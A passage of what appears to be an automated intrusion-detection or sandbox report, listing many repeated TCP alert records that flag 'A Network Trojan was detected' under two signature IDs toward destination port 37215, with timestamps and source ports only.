                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420172
                SID:2835222
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474790
                SID:2829579
                Source Port:45348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701368
                SID:2829579
                Source Port:33386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463245
                SID:2829579
                Source Port:55002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826302
                SID:2829579
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652891
                SID:2835222
                Source Port:41684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387571
                SID:2835222
                Source Port:47672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513673
                SID:2835222
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.978047
                SID:2829579
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856845
                SID:2829579
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912431
                SID:2835222
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585056
                SID:2829579
                Source Port:41570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432314
                SID:2829579
                Source Port:47288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166415
                SID:2835222
                Source Port:46580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926640
                SID:2835222
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931579
                SID:2835222
                Source Port:36098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559078
                SID:2835222
                Source Port:35850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943022
                SID:2829579
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227975
                SID:2835222
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901346
                SID:2835222
                Source Port:44828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966253
                SID:2835222
                Source Port:37256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825998
                SID:2835222
                Source Port:56098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211915
                SID:2829579
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986251
                SID:2835222
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899137
                SID:2829579
                Source Port:43288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499511
                SID:2829579
                Source Port:40470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177288
                SID:2829579
                Source Port:44020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791002
                SID:2835222
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.393510
                SID:2835222
                Source Port:60728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815440
                SID:2829579
                Source Port:35116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437179
                SID:2829579
                Source Port:57994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517879
                SID:2835222
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968444
                SID:2835222
                Source Port:53494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222907
                SID:2829579
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464729
                SID:2835222
                Source Port:51186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869334
                SID:2829579
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557948
                SID:2835222
                Source Port:48252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610191
                SID:2835222
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375315
                SID:2829579
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816712
                SID:2835222
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025550
                SID:2829579
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900425
                SID:2829579
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776565
                SID:2829579
                Source Port:47090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912998
                SID:2835222
                Source Port:40864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890066
                SID:2835222
                Source Port:51632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263912
                SID:2829579
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557693
                SID:2829579
                Source Port:49244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611175
                SID:2835222
                Source Port:56930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521678
                SID:2835222
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596794
                SID:2829579
                Source Port:58508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417834
                SID:2829579
                Source Port:59010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420259
                SID:2829579
                Source Port:59188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728762
                SID:2829579
                Source Port:60442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559134
                SID:2835222
                Source Port:40666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010344
                SID:2829579
                Source Port:53732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559362
                SID:2829579
                Source Port:60432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.590972
                SID:2835222
                Source Port:49726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113243
                SID:2835222
                Source Port:37630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665048
                SID:2835222
                Source Port:43954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807408
                SID:2829579
                Source Port:40990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207926
                SID:2829579
                Source Port:52276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583409
                SID:2835222
                Source Port:41228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422442
                SID:2835222
                Source Port:45090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870084
                SID:2835222
                Source Port:35008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520515
                SID:2835222
                Source Port:46442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059865
                SID:2835222
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463097
                SID:2829579
                Source Port:51418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903790
                SID:2829579
                Source Port:43310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360493
                SID:2835222
                Source Port:58504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858892
                SID:2835222
                Source Port:45920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227285
                SID:2829579
                Source Port:54292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572534
                SID:2835222
                Source Port:52880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419887
                SID:2835222
                Source Port:36842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896470
                SID:2829579
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573355
                SID:2835222
                Source Port:35560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669484
                SID:2835222
                Source Port:56578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979684
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983125
                SID:2829579
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559862
                SID:2835222
                Source Port:48538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965472
                SID:2835222
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228581
                SID:2835222
                Source Port:54326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.655290
                SID:2829579
                Source Port:55432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025628
                SID:2829579
                Source Port:57914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002009
                SID:2829579
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618747
                SID:2835222
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037456
                SID:2835222
                Source Port:58792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461883
                SID:2829579
                Source Port:41542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960442
                SID:2829579
                Source Port:55620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782197
                SID:2829579
                Source Port:46506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897041
                SID:2835222
                Source Port:47240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022435
                SID:2835222
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660895
                SID:2835222
                Source Port:38418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535843
                SID:2829579
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139850
                SID:2829579
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559745
                SID:2829579
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281753
                SID:2835222
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416648
                SID:2835222
                Source Port:46640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022145
                SID:2829579
                Source Port:54712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166697
                SID:2829579
                Source Port:53406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388584
                SID:2835222
                Source Port:35806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869512
                SID:2829579
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945709
                SID:2829579
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325203
                SID:2829579
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178118
                SID:2835222
                Source Port:58042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863333
                SID:2835222
                Source Port:47656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363140
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740309
                SID:2835222
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873728
                SID:2829579
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654809
                SID:2829579
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932019
                SID:2835222
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997712
                SID:2835222
                Source Port:34878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022236
                SID:2835222
                Source Port:60026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182781
                SID:2829579
                Source Port:38796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045012
                SID:2835222
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.071543
                SID:2829579
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520686
                SID:2829579
                Source Port:54896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967407
                SID:2829579
                Source Port:33036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672796
                SID:2835222
                Source Port:35388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265309
                SID:2835222
                Source Port:33826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223902
                SID:2835222
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967257
                SID:2835222
                Source Port:45534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851336
                SID:2829579
                Source Port:34274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277537
                SID:2835222
                Source Port:49148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836576
                SID:2835222
                Source Port:37002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369196
                SID:2835222
                Source Port:38192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963066
                SID:2835222
                Source Port:54380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266457
                SID:2835222
                Source Port:52780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848490
                SID:2829579
                Source Port:57364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862991
                SID:2829579
                Source Port:52996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659466
                SID:2829579
                Source Port:50672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231485
                SID:2835222
                Source Port:48698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166069
                SID:2829579
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727009
                SID:2835222
                Source Port:33848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584524
                SID:2835222
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.819603
                SID:2829579
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812049
                SID:2829579
                Source Port:38852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824267
                SID:2835222
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926841
                SID:2829579
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450825
                SID:2835222
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079085
                SID:2829579
                Source Port:35882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141232
                SID:2829579
                Source Port:41626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839810
                SID:2829579
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415002
                SID:2835222
                Source Port:58382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094890
                SID:2835222
                Source Port:49258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726209
                SID:2835222
                Source Port:43770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791040
                SID:2835222
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362891
                SID:2829579
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966607
                SID:2829579
                Source Port:56872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227184
                SID:2829579
                Source Port:59128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611981
                SID:2829579
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369642
                SID:2829579
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971719
                SID:2829579
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900386
                SID:2829579
                Source Port:36450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977815
                SID:2829579
                Source Port:34042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324521
                SID:2835222
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782451
                SID:2835222
                Source Port:49062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736850
                SID:2835222
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931961
                SID:2835222
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794398
                SID:2829579
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848402
                SID:2835222
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324899
                SID:2829579
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836278
                SID:2829579
                Source Port:48126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282522
                SID:2829579
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162705
                SID:2835222
                Source Port:36298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215672
                SID:2835222
                Source Port:35292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881514
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868731
                SID:2835222
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282932
                SID:2835222
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241983
                SID:2835222
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654648
                SID:2829579
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856286
                SID:2835222
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335095
                SID:2829579
                Source Port:34664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386121
                SID:2829579
                Source Port:45446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786957
                SID:2829579
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989807
                SID:2829579
                Source Port:40644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184214
                SID:2829579
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689044
                SID:2829579
                Source Port:57034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586325
                SID:2829579
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262101
                SID:2835222
                Source Port:37238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028037
                SID:2835222
                Source Port:47980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611498
                SID:2835222
                Source Port:35962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900470
                SID:2835222
                Source Port:51714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878097
                SID:2835222
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941348
                SID:2829579
                Source Port:60978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282126
                SID:2829579
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789501
                SID:2829579
                Source Port:38816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418832
                SID:2829579
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982043
                SID:2829579
                Source Port:55082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280522
                SID:2835222
                Source Port:47144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169433
                SID:2835222
                Source Port:40310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728263
                SID:2835222
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912684
                SID:2835222
                Source Port:36496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782160
                SID:2829579
                Source Port:44396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464124
                SID:2829579
                Source Port:40008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811860
                SID:2835222
                Source Port:40718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140723
                SID:2835222
                Source Port:51684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782708
                SID:2829579
                Source Port:57038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
